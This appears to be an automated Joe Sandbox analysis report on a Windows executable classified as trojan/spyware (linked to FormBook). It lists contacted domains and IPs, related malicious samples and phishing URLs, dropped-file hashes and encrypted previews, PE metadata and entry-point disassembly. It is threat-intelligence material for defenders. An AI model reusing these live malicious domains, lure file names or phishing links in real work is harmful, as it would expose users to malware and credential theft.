https://es.wordpress.org/ | rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://mgmasistencia.com/2021/08/30/hola-mundo/ | rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.4 | rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nginx.net/ | rasdial.exe, 00000006.00000002.3520253093.00000000061B2000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000004372000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | rasdial.exe, 00000006.00000002.3521925818.0000000007DEE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.4 | rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://mgmasistencia.com/comments/feed/ | rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://mgmasistencia.com/wp-json/ | EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://mgmasistencia.com/wp-content/uploads/2021/09/fondo-plumber-1000x429-1.jpg | rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.xforum.tech/647x/?3L9l=FnaXBox54 | EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.00000000041E0000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://mgmasistencia.com/contacto/ | rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.w.org/ | EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | rasdial.exe, 00000006.00000002.3521925818.0000000007DEE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://mgmasistencia.com/feed/ | rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | rasdial.exe, 00000006.00000002.3521925818.0000000007DEE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js?ver=1.4 | rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.redhat.com/docs/manuals/enterprise/ | rasdial.exe, 00000006.00000002.3520253093.00000000061B2000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000004372000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | rasdial.exe, 00000006.00000002.3521925818.0000000007DEE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://wordpress.org/ | rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://mgmasistencia.com/2021/08/30/hola-mundo/#comment-1 | rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://mgmasistencia.com/xmlrpc.php?rsd | rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.redhat.com/ | EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000004372000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | rasdial.exe, 00000006.00000002.3521925818.0000000007DEE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
176.57.64.102 | www.ayypromo.shop | Bosnia and Herzegowina | 47959 | TELINEABA | false
167.172.133.32 | www.onlytradez.club | United States | 14061 | DIGITALOCEAN-ASNUS | false
18.183.3.45 | www.cannulafactory.top | United States | 16509 | AMAZON-02US | false
194.233.65.154 | weep.site | Germany | 6659 | NEXINTO-DE | false
103.224.182.242 | www.xforum.tech | Australia | 133618 | TRELLIAN-AS-APTrellianPtyLimitedAU | false
45.157.69.194 | www.88nn.pro | Germany | 136933 | GIGABITBANK-AS-APGigabitbankGlobalHK | false
66.29.149.180 | www.jaxo.xyz | United States | 19538 | ADVANTAGECOMUS | true
37.187.158.211 | fontanerourgente.net | France | 16276 | OVHFR | false
206.119.82.116 | 32wxd.top | United States | 174 | COGENT-174US | false
                                      Joe Sandbox version:40.0.0 Tourmaline
                                      Analysis ID:1499198
                                      Start date and time:2024-08-26 18:25:48 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 8m 57s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Run name:Run with higher sleep bypass
                                      Number of analysed new started processes analysed:9
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:2
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:031215-Revised-01.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@7/5@10/9
                                      EGA Information:
                                      • Successful, ratio: 75%
                                      HCA Information:
                                      • Successful, ratio: 91%
                                      • Number of executed functions: 51
                                      • Number of non-executed functions: 299
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • VT rate limit hit for: 031215-Revised-01.exe
Time | Type | Description
12:27:56 | API Interceptor | 5459126x Sleep call for process: rasdial.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
176.57.64.102 | Copy of 01. Bill of Material - 705.exe | malicious | FormBook | www.ayypromo.shop/rgqx/
176.57.64.102 | Pro#U015bba o Wycena - Strony 4-6.vbs | malicious | FormBook, GuLoader | www.ayypromo.shop/mktg/
176.57.64.102 | TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe | malicious | FormBook | www.ayypromo.shop/6ocx/
167.172.133.32 | Copy of 01. Bill of Material - 705.exe | malicious | FormBook | www.onlytradez.club/zctj/
167.172.133.32 | RCZ-PI-4057.exe | malicious | FormBook | www.onlytradez.club/zctj/
167.172.133.32 | APS-0240226.exe | malicious | FormBook | www.onlytradez.club/zctj/
167.172.133.32 | Contract.exe | malicious | FormBook | www.onlytradez.club/h6ky/
167.172.133.32 | draft Proforma Invoice.exe | malicious | FormBook | www.onlytradez.club/h6ky/
18.183.3.45 | Copy of 01. Bill of Material - 705.exe | malicious | FormBook | www.cannulafactory.top/l90v/
18.183.3.45 | RCZ-PI-4057.exe | malicious | FormBook | www.cannulafactory.top/l90v/
18.183.3.45 | APS-0240226.exe | malicious | FormBook | www.cannulafactory.top/l90v/
18.183.3.45 | Pro#U015bba o Wycena - Strony 4-6.vbs | malicious | FormBook, GuLoader | www.cannulafactory.top/y82c/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.onlytradez.club | Copy of 01. Bill of Material - 705.exe | malicious | FormBook | 167.172.133.32
www.onlytradez.club | RCZ-PI-4057.exe | malicious | FormBook | 167.172.133.32
www.onlytradez.club | APS-0240226.exe | malicious | FormBook | 167.172.133.32
www.onlytradez.club | Contract.exe | malicious | FormBook | 167.172.133.32
www.onlytradez.club | draft Proforma Invoice.exe | malicious | FormBook | 167.172.133.32
www.ayypromo.shop | Copy of 01. Bill of Material - 705.exe | malicious | FormBook | 176.57.64.102
www.ayypromo.shop | Pro#U015bba o Wycena - Strony 4-6.vbs | malicious | FormBook, GuLoader | 176.57.64.102
www.ayypromo.shop | TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe | malicious | FormBook | 176.57.64.102
www.jaxo.xyz | Copy of 01. Bill of Material - 705.exe | malicious | FormBook | 66.29.149.180
www.jaxo.xyz | RCZ-PI-4057.exe | malicious | FormBook | 66.29.149.180
www.jaxo.xyz | APS-0240226.exe | malicious | FormBook | 66.29.149.180
www.cannulafactory.top | Copy of 01. Bill of Material - 705.exe | malicious | FormBook | 18.183.3.45
www.cannulafactory.top | RCZ-PI-4057.exe | malicious | FormBook | 18.183.3.45
www.cannulafactory.top | APS-0240226.exe | malicious | FormBook | 18.183.3.45
www.cannulafactory.top | Pro#U015bba o Wycena - Strony 4-6.vbs | malicious | FormBook, GuLoader | 18.183.3.45
Match | Associated Sample Name / URL | Detection | Threat Name | Context
NEXINTO-DE | Copy of 01. Bill of Material - 705.exe | malicious | FormBook | 194.233.65.154
NEXINTO-DE | RCZ-PI-4057.exe | malicious | FormBook | 194.233.65.154
NEXINTO-DE | APS-0240226.exe | malicious | FormBook | 194.233.65.154
NEXINTO-DE | Shipping document_pdf.exe | malicious | FormBook | 194.233.65.154
NEXINTO-DE | arm.elf | malicious | Mirai | 212.229.153.86
NEXINTO-DE | 77.90.35.9-skid.arm-2024-07-30T07_10_51.elf | malicious | Mirai, Moobot | 212.229.18.16
NEXINTO-DE | TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe | malicious | FormBook | 194.195.220.41
NEXINTO-DE | rf4LFk7Nvv.elf | malicious | Mirai | 194.195.1.127
NEXINTO-DE | WIwTo1UTMq.elf | malicious | Mirai | 195.180.12.62
NEXINTO-DE | file.exe | malicious | SystemBC | 194.163.142.67
DIGITALOCEAN-ASNUS | http://email.e.quickshipping.com/c/eJx8zE1SxCAQQOHTkJ0p6BB-Fizc5B7QNNImk0Rg9PqWHmDW79WXAyjnkCYKyoI2zhi9TjVYbyFLowCKTV5KH92SfbEqJYeF3MQBJGjpwKh10drPaHC1MVP0TiWTvdCS5q8n494r3zefHzNej-kIdYy7i-VdwCZgS7Rzm-OInSq3R9yp_X0Ctp_7jU88npm6gK1R5kY4BCyfV6_zVQoPoeWBcQxq4zr_-RZe1e8AvwEAAP__b-JMwA | malicious | HTMLPhisher | 157.230.6.220
DIGITALOCEAN-ASNUS | https://decktop.us/MUYKd1 | malicious | HTMLPhisher | 157.230.79.42
DIGITALOCEAN-ASNUS | http://tsretires.co/CZNFFSN | malicious | Unknown | 188.166.104.134
DIGITALOCEAN-ASNUS | https://protection-suggestion.com | malicious | Unknown | 167.99.123.14
DIGITALOCEAN-ASNUS | Invitation.lnk | malicious | Unknown | 157.245.63.23
DIGITALOCEAN-ASNUS | http://designz23.live | malicious | Unknown | 45.55.34.126
DIGITALOCEAN-ASNUS | https://facebook.devraushan.live/ | malicious | Unknown | 64.227.152.232
DIGITALOCEAN-ASNUS | qqI6NrkizY.exe | malicious | MeshAgent | 104.248.229.104
DIGITALOCEAN-ASNUS | qqI6NrkizY.exe | malicious | MeshAgent | 104.248.229.104
DIGITALOCEAN-ASNUS | 3HyQ3UqWop.exe | malicious | Lokibot, PureLog Stealer | 104.248.205.66
TELINEABA | Copy of 01. Bill of Material - 705.exe | malicious | FormBook | 176.57.64.102
TELINEABA | Pro#U015bba o Wycena - Strony 4-6.vbs | malicious | FormBook, GuLoader | 176.57.64.102
TELINEABA | TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe | malicious | FormBook | 176.57.64.102
TELINEABA | sKQrQ9KjPJ.elf | malicious | Mirai | 88.214.61.219
TELINEABA | KE4cyjDEDO.elf | malicious | Mirai | 88.214.61.224
TELINEABA | http://91.223.169.83 | malicious | Unknown | 91.223.169.83
TELINEABA | 2hUhvRdIqt.elf | malicious | Mirai | 88.214.61.255
TELINEABA | PkQB1rE5kK.elf | malicious | Mirai | 88.214.61.240
TELINEABA | mUZS5TqzCm.elf | malicious | Mirai | 45.93.94.133
TELINEABA | 5tuUOk0hKz.elf | malicious | Mirai | 88.214.61.216
AMAZON-02US | Remittance 728 Norriselectric0032xslx.pdf | malicious | HTMLPhisher | 100.20.3.119
AMAZON-02US | https://trk.klclick3.com/ls/click?upn=u001.6siYSo5Pf-2BsfrkOXqpQpu86Kr888UqdfqgKfFtRbt9NCu1Tdn7OY7u0jHc-2FuQNCaUBs-2FIlLRXXSnnS-2FAdwjw34TI4hs1oeJU-2FNDsYEJlQLk-3DnROQ_I1gl4DqzBtxcoEyzDnCjkADJXy0jvVaDPbRZSILu7s63jqLmHcNmHjSDeBoMiWGooVn2FNvisvEj7isUBM-2Fre-2FY3XNJx5b8z6yZmmiTSKaV5rd0ve9uLzcwdpxCHr3jJMYOSl0j46LECkqCMQlHI-2Fc7BiUcWbDFSJwk00sLALqS-2FGkqmIAUlfGbJT9ApqCJnyYRbkoJrJlv1ASY5OaIQytFKF8a0gX0taKnzZN5PzdJ-2BP99C5E2-2BaqJaC-2BBDTd7HwKUFjEvSQRN1ex8L-2FNUeYIhwJ5FbzB1x8P0CO1W8PwypgYImQJqiYWM-2B9t8rmzZKd-2BLW99GUvt47enXoWk6V7wYZfxNP1EZnCFtVE2agRWo-3D | malicious | Unknown | 108.156.60.2
AMAZON-02US | file.exe | malicious | Unknown | 52.222.236.48
AMAZON-02US | http://online.stat.tamu.edu | malicious | Unknown | 108.156.224.32
AMAZON-02US | https://decktop.us/MUYKd1 | malicious | HTMLPhisher | 13.227.219.14
AMAZON-02US | http://tsretires.co/CZNFFSN | malicious | Unknown | 18.238.243.35
AMAZON-02US | SecuriteInfo.com.Trojan.Linux.GenericKD.42965685.3102.14954.elf | malicious | Unknown | 34.249.145.219
AMAZON-02US | https://bridgewater.1bv0.com | malicious | Unknown | 76.76.21.9
AMAZON-02US | MDE_File_Sample_775c04b737da218ea8e0cf00c15e7212960dd200.zip | malicious | Unknown | 3.165.136.19
AMAZON-02US | https://bridgewatercr.vercel.app | malicious | Unknown | 76.76.21.164
                                      No context
                                      No context
                                      Process:C:\Windows\SysWOW64\rasdial.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                      Category:dropped
                                      Size (bytes):114688
                                      Entropy (8bit):0.9746603542602881
                                      Encrypted:false
                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\031215-Revised-01.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):286208
                                      Entropy (8bit):7.9950764444859646
                                      Encrypted:true
                                      SSDEEP:6144:Xf8jAovoODYMm7yuBKmbuSLydqahlukVCDEHViE16Z/:Xf8jAoUMHuhbuSLBa33RBy
                                      MD5:D23AB610794AA32BF62645CAC82C7162
                                      SHA1:0347532B42A2BD38DDEC06253131E4D9F3862CC0
                                      SHA-256:0C363DE368B33F4D359FB9B9B8EA090ADDFE3D7F348D8F6273C59EC390AA0B83
                                      SHA-512:424ED5C8F10D00E74022EDE6231A57820AB48AA55DF3DF94E618A7B5E28B15217BFD2ADF2FEC9855D12748F2D26BC132F1535A8470C658774F203FFCBEBE0201
                                      Malicious:false
                                      Reputation:low
                                      Preview:.....UTIQ..@......O4.pHE...RUTIQUUAI92Y13UO718OXKMUFSRUTI.UUAG&.W1.\...9..j.=/ r%&&6'4,iZS7_\!oUT.=-%m<(s...i<:1$g4?S.3UO718O!JD.{35.i)6.h!..(...o/P."..q5!.H...m52..PQ1.S2.718OXKMU..RU.HPU...d2Y13UO71.OZJFTMSR.PIQUUAI92Y.&UO7!8OX+IUFS.UTYQUUCI94Y13UO71>OXKMUFSR5PIQWUAI92Y33..71(OX[MUFSBUTYQUUAI9"Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y.G07C18OL.IUFCRUT.UUUQI92Y13UO718OXKmUF3RUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUA
                                      Process:C:\Users\user\Desktop\031215-Revised-01.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):43554
                                      Entropy (8bit):7.8228571885146
                                      Encrypted:false
                                      SSDEEP:768:zUgLgqfD9nPKQeMfhpw+tiaq07oZAT/OlpUQDzuEV0qkw3enAuKuBIHKokFYlAMB:zUgDDdytMfTw+IUoZq8zu4z21MK0kvg
                                      MD5:92FF176E5A53C7ABF0E0686F85871F65
                                      SHA1:82C78ECF8682474A88A3F42F292F8C0D3B84F27B
                                      SHA-256:1DA98B066EA96B52B3E49250D497F013BBD6256FC4A50249FEFD4DA492E626CF
                                      SHA-512:4AF414336F444A01E4E1D49F1BDE1CA401B5CD3FDEAE5BC0EBEC53BA0F3F9B2F6566F7E1B4B3F55DACBDE62D5B2E8F885340EF80D1E9BE3F0991D5D939F63E42
                                      Malicious:false
                                      Reputation:low
                                      Preview:EA06..P...*.y.Vg5...9..6.V&.Z..gY..+39..aB.L.si.,....).9..g0........<.L...3..fsz$.eQ..).9..m2.L......UQ&s..2.3.T.....g9.....:g8.L...Bg9..*S9...E..j.9..g0..7.j$.mI..g5...6.R.s...mJ.6&.....3.Q.s....3.Q..`..S.sj..qI..js9.\...{*@.(.I6........V.)`.....U&s.T.r.2.....6cT....J.....R....aZ..f...6g8...3J..h.......6...s`...UR.6...J.3@C....3..&. ..m5..T..FgW...YqK...@.........3..@C....v.)....3...s*..t.?....Z..&sj..qH..i`.,....L.T..6...s*..kS.>..:.... ...3.S@...$.\.L./@.R.R.@.6...p...Fg6...T......L. 1...F..@..4.gC....UH....QT...)9.L.)..3.......6........j...\....).......Q....jm1...tI..6.D.g..B..I. ...&r..U..*x..C.Mj.2U.....1..+ &@..T.v@...mU....j..mP.M..`..eF... ?`.EV.>.``..g6..*s9...X..f.....M.DI..qA.Bf.P.vd.NQ.U.X.mY.S......* ....I..&..%fm6....0.....)......1R...x..L.H..|..#8.M.....m1..).i.0....KT.+.....)`5..6)..0.QO.. @....TM@?.T.gG.M..#.P....)`Z.jg2..+."....T.....U.. ...$.x(3i..m6..C.......@@B...../P@..8..A...`....V.@f.....F.....u8.].P@6*..gE.h..I.$.&..RT.F..,.8
                                      Process:C:\Users\user\Desktop\031215-Revised-01.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):286208
                                      Entropy (8bit):7.9950764444859646
                                      Encrypted:true
                                      SSDEEP:6144:Xf8jAovoODYMm7yuBKmbuSLydqahlukVCDEHViE16Z/:Xf8jAoUMHuhbuSLBa33RBy
                                      MD5:D23AB610794AA32BF62645CAC82C7162
                                      SHA1:0347532B42A2BD38DDEC06253131E4D9F3862CC0
                                      SHA-256:0C363DE368B33F4D359FB9B9B8EA090ADDFE3D7F348D8F6273C59EC390AA0B83
                                      SHA-512:424ED5C8F10D00E74022EDE6231A57820AB48AA55DF3DF94E618A7B5E28B15217BFD2ADF2FEC9855D12748F2D26BC132F1535A8470C658774F203FFCBEBE0201
                                      Malicious:false
                                      Preview:.....UTIQ..@......O4.pHE...RUTIQUUAI92Y13UO718OXKMUFSRUTI.UUAG&.W1.\...9..j.=/ r%&&6'4,iZS7_\!oUT.=-%m<(s...i<:1$g4?S.3UO718O!JD.{35.i)6.h!..(...o/P."..q5!.H...m52..PQ1.S2.718OXKMU..RU.HPU...d2Y13UO71.OZJFTMSR.PIQUUAI92Y.&UO7!8OX+IUFS.UTYQUUCI94Y13UO71>OXKMUFSR5PIQWUAI92Y33..71(OX[MUFSBUTYQUUAI9"Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y.G07C18OL.IUFCRUT.UUUQI92Y13UO718OXKmUF3RUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUA
                                      Process:C:\Users\user\Desktop\031215-Revised-01.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:dropped
                                      Size (bytes):86022
                                      Entropy (8bit):4.17980221192401
                                      Encrypted:false
                                      SSDEEP:768:Y71DVAIGDoLqVGO9gHhoBDzZ6QyvjRN+zqssyJfkCrY0INznci6C2CdaZfcW9UTj:YpPm0O9wEDAXjasqhrahEhyapwTeAxB
                                      MD5:2BE24264E6D80923E906D39F4CD3BB31
                                      SHA1:57EA25A17EBECB2D177CFBEC9BC0C3DFFB071AF1
                                      SHA-256:E41073C862814FB569500C6B4060AB5AF9BC7A539286B6A3095C0263BDF49089
                                      SHA-512:C5EE360DFE74E8DD8476B98B6A135FA1B40A91F8901BCA1F504EA174EA767F6E2EEBCAAE20E55DA4DF76B8A1EB7965E2A177043EA3174809F3119B0324EC6A0E
                                      Malicious:false
                                       Preview:
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.1263317709111975
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:031215-Revised-01.exe
                                      File size:1'276'416 bytes
                                      MD5:1bf161b2bc2c8efddf6fbc402dfb9508
                                      SHA1:0525fb1f6e537a26faf3438b1d5d9e118e3a9a52
                                      SHA256:99e143144585b210119ead96a354e3425f4b84a58a7554de9e89aa3a9154c21f
                                      SHA512:808203ff2a5cb4b2cccb0c1856b2c71768914f346432b09e29a2d5339a6cbc240f2ea3089c602634b63cc93625ca5fdee824a32ef3fe960a1606ea075fc3c45f
                                      SSDEEP:24576:CqDEvCTbMWu7rQYlBQcBiT6rprG8a3OmaIZB6R8l95/Ijc:CTvC/MTQYxsWR7a3BQ
                                      TLSH:CB45CF027381C062FF9B92734F5AF6515BBC6A260123E51F13A81DB9BE705B1463E7A3
                                      File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                      Icon Hash:61b1b1654c004101
                                      Entrypoint:0x420577
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x66CC6071 [Mon Aug 26 11:01:05 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:948cc502fe9226992dce9417f952fce3
                                      Instruction
                                      call 00007FE77C801F53h
                                      jmp 00007FE77C80185Fh
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      push dword ptr [ebp+08h]
                                      mov esi, ecx
                                      call 00007FE77C801A3Dh
                                      mov dword ptr [esi], 0049FDF0h
                                      mov eax, esi
                                      pop esi
                                      pop ebp
                                      retn 0004h
                                      and dword ptr [ecx+04h], 00000000h
                                      mov eax, ecx
                                      and dword ptr [ecx+08h], 00000000h
                                      mov dword ptr [ecx+04h], 0049FDF8h
                                      mov dword ptr [ecx], 0049FDF0h
                                      ret
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      push dword ptr [ebp+08h]
                                      mov esi, ecx
                                      call 00007FE77C801A0Ah
                                      mov dword ptr [esi], 0049FE0Ch
                                      mov eax, esi
                                      pop esi
                                      pop ebp
                                      retn 0004h
                                      and dword ptr [ecx+04h], 00000000h
                                      mov eax, ecx
                                      and dword ptr [ecx+08h], 00000000h
                                      mov dword ptr [ecx+04h], 0049FE14h
                                      mov dword ptr [ecx], 0049FE0Ch
                                      ret
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      mov esi, ecx
                                      lea eax, dword ptr [esi+04h]
                                      mov dword ptr [esi], 0049FDD0h
                                      and dword ptr [eax], 00000000h
                                      and dword ptr [eax+04h], 00000000h
                                      push eax
                                      mov eax, dword ptr [ebp+08h]
                                      add eax, 04h
                                      push eax
